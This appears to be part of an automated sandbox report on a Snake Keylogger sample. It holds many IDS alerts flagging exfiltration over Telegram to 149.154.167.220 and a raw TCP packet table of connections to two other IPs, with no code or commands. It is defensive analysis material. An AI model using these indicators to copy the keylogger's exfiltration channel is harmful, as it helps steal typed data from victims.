                                      2024-09-26T10:59:38.342591+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449760149.154.167.220443TCP
                                      2024-09-26T10:59:39.310111+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449761149.154.167.220443TCP
                                      2024-09-26T10:59:43.238124+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449762149.154.167.220443TCP
                                      2024-09-26T10:59:44.270641+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449763149.154.167.220443TCP
                                      2024-09-26T10:59:45.246722+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449764149.154.167.220443TCP
                                      2024-09-26T10:59:46.170442+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449765149.154.167.220443TCP
                                      2024-09-26T10:59:47.088270+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449766149.154.167.220443TCP
                                      2024-09-26T10:59:51.029398+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449767149.154.167.220443TCP
                                      2024-09-26T10:59:51.976834+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449768149.154.167.220443TCP
                                      2024-09-26T10:59:52.918953+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449769149.154.167.220443TCP
                                      2024-09-26T10:59:53.828892+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449770149.154.167.220443TCP
                                      2024-09-26T10:59:54.730651+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449771149.154.167.220443TCP
                                      2024-09-26T10:59:58.648936+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449772149.154.167.220443TCP
                                      2024-09-26T10:59:59.574413+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449774149.154.167.220443TCP
                                      2024-09-26T11:00:00.559091+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449775149.154.167.220443TCP
                                      2024-09-26T11:00:01.614664+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449776149.154.167.220443TCP
                                      2024-09-26T11:00:02.510408+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449777149.154.167.220443TCP
                                      2024-09-26T11:00:03.459104+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449778149.154.167.220443TCP
                                      2024-09-26T11:00:04.381999+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449779149.154.167.220443TCP
                                      2024-09-26T11:00:05.432464+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449780149.154.167.220443TCP
                                      2024-09-26T11:00:06.583485+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449781149.154.167.220443TCP
                                      2024-09-26T11:00:07.533281+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449782149.154.167.220443TCP
                                      2024-09-26T11:00:08.559168+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449783149.154.167.220443TCP
                                      2024-09-26T11:00:10.378152+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449784149.154.167.220443TCP
                                      2024-09-26T11:00:11.359345+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449785149.154.167.220443TCP
                                      2024-09-26T11:00:12.297322+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449786149.154.167.220443TCP
                                      2024-09-26T11:00:13.303418+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449787149.154.167.220443TCP
                                      2024-09-26T11:00:14.204559+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449788149.154.167.220443TCP
                                      2024-09-26T11:00:15.476208+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449789149.154.167.220443TCP
                                      2024-09-26T11:00:25.125794+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449790149.154.167.220443TCP
                                      2024-09-26T11:00:26.047019+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449791149.154.167.220443TCP
                                      2024-09-26T11:00:26.962687+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449792149.154.167.220443TCP
                                      2024-09-26T11:00:28.652152+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449793149.154.167.220443TCP
                                      2024-09-26T11:00:29.861520+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449794149.154.167.220443TCP
                                      2024-09-26T11:00:30.783422+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449795149.154.167.220443TCP
                                      2024-09-26T11:00:31.689037+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449796149.154.167.220443TCP
                                      2024-09-26T11:00:32.621264+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449797149.154.167.220443TCP
                                      2024-09-26T11:00:33.518772+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449798149.154.167.220443TCP
                                      2024-09-26T11:00:37.423906+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449799149.154.167.220443TCP
                                      2024-09-26T11:00:38.901327+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449800149.154.167.220443TCP
                                      2024-09-26T11:00:39.837306+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449801149.154.167.220443TCP
                                      2024-09-26T11:00:40.814344+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449802149.154.167.220443TCP
                                      2024-09-26T11:00:41.764836+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449803149.154.167.220443TCP
                                      2024-09-26T11:00:43.381471+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449804149.154.167.220443TCP
                                      2024-09-26T11:00:45.155505+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449805149.154.167.220443TCP
                                      2024-09-26T11:00:46.094598+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449806149.154.167.220443TCP
                                      2024-09-26T11:00:47.132841+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449807149.154.167.220443TCP
                                      2024-09-26T11:00:48.114079+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449808149.154.167.220443TCP
                                      2024-09-26T11:00:49.293533+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449809149.154.167.220443TCP
                                      2024-09-26T11:00:50.264080+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449810149.154.167.220443TCP
                                      2024-09-26T11:00:51.337054+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449811149.154.167.220443TCP
                                      2024-09-26T11:00:52.295641+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449812149.154.167.220443TCP
                                      2024-09-26T11:00:53.787937+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449813149.154.167.220443TCP
                                      2024-09-26T11:00:54.815737+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449814149.154.167.220443TCP
                                      2024-09-26T11:00:55.730336+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449815149.154.167.220443TCP
                                      2024-09-26T11:00:56.654927+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449816149.154.167.220443TCP
                                      2024-09-26T11:00:57.613721+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449817149.154.167.220443TCP
                                      2024-09-26T11:00:58.570975+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449818149.154.167.220443TCP
                                      2024-09-26T11:00:59.549474+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449819149.154.167.220443TCP
                                      2024-09-26T11:01:00.566994+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449820149.154.167.220443TCP
                                      2024-09-26T11:01:01.468993+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449821149.154.167.220443TCP
                                      2024-09-26T11:01:02.694692+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449822149.154.167.220443TCP
                                      2024-09-26T11:01:04.651076+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449823149.154.167.220443TCP
                                      2024-09-26T11:01:05.896560+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449824149.154.167.220443TCP
                                      2024-09-26T11:01:06.797225+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449825149.154.167.220443TCP
                                      2024-09-26T11:01:07.705404+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449826149.154.167.220443TCP
                                      2024-09-26T11:01:08.640317+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449827149.154.167.220443TCP
                                      2024-09-26T11:01:09.541051+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449828149.154.167.220443TCP
                                      2024-09-26T11:01:10.459831+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449829149.154.167.220443TCP
                                      2024-09-26T11:01:11.368468+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449830149.154.167.220443TCP
                                      2024-09-26T11:01:12.287635+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449831149.154.167.220443TCP
                                      2024-09-26T11:01:13.196540+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449832149.154.167.220443TCP
                                      2024-09-26T11:01:14.114327+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449833149.154.167.220443TCP
                                      2024-09-26T11:01:15.016882+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449834149.154.167.220443TCP
                                      2024-09-26T11:01:15.932889+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449835149.154.167.220443TCP
                                      2024-09-26T11:01:24.909478+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449836149.154.167.220443TCP
                                      2024-09-26T11:01:25.842970+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449837149.154.167.220443TCP
                                      2024-09-26T11:01:26.766599+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449838149.154.167.220443TCP
                                      2024-09-26T11:01:27.674843+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449839149.154.167.220443TCP
                                      2024-09-26T11:01:28.998332+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449840149.154.167.220443TCP
                                      2024-09-26T11:01:29.938523+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449841149.154.167.220443TCP
                                      2024-09-26T11:01:30.885673+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449842149.154.167.220443TCP
                                      2024-09-26T11:01:32.219178+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449843149.154.167.220443TCP
                                      2024-09-26T11:01:33.156071+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449844149.154.167.220443TCP
                                      2024-09-26T11:01:34.164354+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449845149.154.167.220443TCP
                                      2024-09-26T11:01:35.318573+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449846149.154.167.220443TCP
                                      2024-09-26T11:01:36.241710+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449847149.154.167.220443TCP
                                      2024-09-26T11:01:37.230002+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449848149.154.167.220443TCP
                                      2024-09-26T11:01:38.317560+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449849149.154.167.220443TCP
                                      2024-09-26T11:01:40.135771+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449850149.154.167.220443TCP
                                      2024-09-26T11:01:41.308732+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449851149.154.167.220443TCP
                                      2024-09-26T11:01:42.406685+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449852149.154.167.220443TCP
                                      2024-09-26T11:01:43.400114+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449853149.154.167.220443TCP
                                      2024-09-26T11:01:44.719292+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449854149.154.167.220443TCP
                                      2024-09-26T11:01:45.772223+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449855149.154.167.220443TCP
                                      2024-09-26T11:01:46.746165+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449856149.154.167.220443TCP
                                      2024-09-26T11:01:47.742253+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449857149.154.167.220443TCP
                                      2024-09-26T11:01:48.654016+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449858149.154.167.220443TCP
                                      2024-09-26T11:01:50.581715+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449859149.154.167.220443TCP
                                      2024-09-26T11:01:51.608499+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449860149.154.167.220443TCP
                                      2024-09-26T11:01:52.517072+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449861149.154.167.220443TCP
                                      2024-09-26T11:01:53.447963+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449862149.154.167.220443TCP
                                      2024-09-26T11:01:54.350230+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449863149.154.167.220443TCP
                                      2024-09-26T11:01:55.228373+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449864149.154.167.220443TCP
                                      2024-09-26T11:01:56.166560+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449865149.154.167.220443TCP
                                      2024-09-26T11:01:57.329028+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449866149.154.167.220443TCP
                                      2024-09-26T11:01:58.273561+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449867149.154.167.220443TCP
                                      2024-09-26T11:01:59.199831+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449868149.154.167.220443TCP
                                      2024-09-26T11:02:00.152322+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449869149.154.167.220443TCP
                                      2024-09-26T11:02:01.055371+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449870149.154.167.220443TCP
                                      2024-09-26T11:02:01.951206+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449871149.154.167.220443TCP
                                      2024-09-26T11:02:02.829604+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449872149.154.167.220443TCP
                                      2024-09-26T11:02:03.828956+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449873149.154.167.220443TCP
                                      2024-09-26T11:02:04.932842+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449874149.154.167.220443TCP
                                      2024-09-26T11:02:05.959710+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449875149.154.167.220443TCP
                                      2024-09-26T11:02:06.917530+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449876149.154.167.220443TCP
                                      2024-09-26T11:02:07.794842+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449877149.154.167.220443TCP
                                      2024-09-26T11:02:08.824328+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449878149.154.167.220443TCP
                                      2024-09-26T11:02:09.942677+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449879149.154.167.220443TCP
                                      2024-09-26T11:02:10.926451+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449880149.154.167.220443TCP
                                      2024-09-26T11:02:11.805289+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449881149.154.167.220443TCP
                                      2024-09-26T11:02:12.746607+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449882149.154.167.220443TCP
                                      2024-09-26T11:02:13.657135+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449883149.154.167.220443TCP
                                      2024-09-26T11:02:14.746589+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449884149.154.167.220443TCP
                                      2024-09-26T11:02:15.682786+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449885149.154.167.220443TCP
                                      2024-09-26T11:02:24.697414+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449886149.154.167.220443TCP
                                      2024-09-26T11:02:28.690087+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449887149.154.167.220443TCP
                                      2024-09-26T11:02:29.843864+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449888149.154.167.220443TCP
                                      2024-09-26T11:02:30.802683+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449889149.154.167.220443TCP
                                      2024-09-26T11:02:31.746613+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449890149.154.167.220443TCP
                                      2024-09-26T11:02:32.700215+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449891149.154.167.220443TCP
                                      2024-09-26T11:02:33.616265+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449892149.154.167.220443TCP
                                      2024-09-26T11:02:37.575968+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449893149.154.167.220443TCP
                                      2024-09-26T11:02:38.511567+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449894149.154.167.220443TCP
                                      2024-09-26T11:02:39.432699+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449895149.154.167.220443TCP
                                      2024-09-26T11:02:40.367326+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449896149.154.167.220443TCP
                                      2024-09-26T11:02:41.391783+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449897149.154.167.220443TCP
                                      2024-09-26T11:02:45.414509+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449898149.154.167.220443TCP
                                      2024-09-26T11:02:46.456880+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449899149.154.167.220443TCP
                                      2024-09-26T11:02:47.424948+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449900149.154.167.220443TCP
                                      2024-09-26T11:02:48.358700+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449901149.154.167.220443TCP
                                      2024-09-26T11:02:49.569534+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449902149.154.167.220443TCP
                                      2024-09-26T11:02:50.566009+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449903149.154.167.220443TCP
                                      2024-09-26T11:02:51.506020+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449904149.154.167.220443TCP
                                      2024-09-26T11:02:52.574256+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449905149.154.167.220443TCP
                                      2024-09-26T11:02:53.543905+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449906149.154.167.220443TCP
                                      2024-09-26T11:02:54.460326+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449907149.154.167.220443TCP
                                      2024-09-26T11:02:55.359781+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449908149.154.167.220443TCP
                                      2024-09-26T11:02:57.045205+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449909149.154.167.220443TCP
                                      2024-09-26T11:02:57.939710+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449910149.154.167.220443TCP
                                      2024-09-26T11:02:58.851194+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449911149.154.167.220443TCP
                                      2024-09-26T11:02:59.812610+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449912149.154.167.220443TCP
                                      2024-09-26T11:03:00.867641+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449913149.154.167.220443TCP
                                      2024-09-26T11:03:01.825600+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449914149.154.167.220443TCP
                                      2024-09-26T11:03:03.046369+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449915149.154.167.220443TCP
                                      2024-09-26T11:03:03.962991+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449916149.154.167.220443TCP
                                      2024-09-26T11:03:04.918003+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449917149.154.167.220443TCP
                                      2024-09-26T11:03:05.858583+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449918149.154.167.220443TCP
                                      2024-09-26T11:03:06.970959+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449919149.154.167.220443TCP
                                      2024-09-26T11:03:07.955933+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449920149.154.167.220443TCP
                                      2024-09-26T11:03:09.452036+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449921149.154.167.220443TCP
                                      2024-09-26T11:03:10.431546+02002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449922149.154.167.220443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 26, 2024 10:59:05.351784945 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:05.356753111 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:05.356844902 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:05.357048035 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:05.361799002 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:05.997343063 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:06.002342939 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:06.007250071 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:08.343424082 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:08.404372931 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:08.404411077 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:08.404505968 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:08.414443970 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:08.414472103 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:08.503535032 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:08.913305998 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:08.913397074 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:08.918649912 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:08.918690920 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:08.919073105 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:08.999022961 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:09.039408922 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:09.109744072 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:09.109850883 CEST44349735188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:09.109915018 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:09.115191936 CEST49735443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:09.118949890 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:09.123815060 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:10.368966103 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:10.372870922 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.372921944 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.372989893 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.373390913 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.373409033 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.425477028 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.833076000 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.837858915 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.837899923 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.981005907 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.981139898 CEST44349737188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:10.981381893 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.981792927 CEST49737443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:10.985080004 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.986341000 CEST4973880192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.990129948 CEST8049733193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:10.990216017 CEST4973380192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.991130114 CEST8049738193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:10.991204977 CEST4973880192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.991296053 CEST4973880192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:10.996071100 CEST8049738193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:11.648478985 CEST8049738193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:11.649971008 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:11.650001049 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:11.650094986 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:11.650368929 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:11.650382042 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:11.691080093 CEST4973880192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:12.111785889 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:12.113343954 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:12.113368034 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:12.247435093 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:12.247550964 CEST44349739188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:12.247617960 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:12.248219967 CEST49739443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:12.263978004 CEST4974080192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:12.268907070 CEST8049740193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:12.269012928 CEST4974080192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:12.269133091 CEST4974080192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:12.273935080 CEST8049740193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:13.033413887 CEST8049740193.122.6.168192.168.2.4
                                      Sep 26, 2024 10:59:13.035204887 CEST49741443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:13.035280943 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.035408020 CEST49741443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:13.035733938 CEST49741443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:13.035758972 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.081660032 CEST4974080192.168.2.4193.122.6.168
                                      Sep 26, 2024 10:59:13.489346027 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.490906000 CEST49741443192.168.2.4188.114.96.3
                                      Sep 26, 2024 10:59:13.490927935 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.638364077 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.638463020 CEST44349741188.114.96.3192.168.2.4
                                      Sep 26, 2024 10:59:13.638545036 CEST49741443192.168.2.4188.114.96.3
